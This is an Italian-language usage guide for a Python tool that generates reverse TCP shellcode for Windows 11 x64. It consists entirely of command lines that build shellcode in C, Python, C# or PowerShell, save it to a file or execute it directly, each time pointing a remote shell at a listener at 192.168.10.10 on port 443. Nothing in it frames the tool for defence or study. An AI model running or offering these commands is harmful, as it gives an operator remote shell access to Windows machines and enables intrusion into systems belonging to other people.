
Shellcodes per Windows >= 11 x64
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443
Il linguaggio predefinito è lo shellcode in C, ma sono supportati anche Python, Csharp e PowerShell:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --language powershell
Per salvare il file:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true
L'output predefinito è output.bin:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 --save true --output shellcode.bin
Per testare ed eseguire:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true
Oppure:
python ./shell_reverse_tcp.py -i 192.168.10.10 -p 443 -execution true --language powershell --save true --output shellcode.bin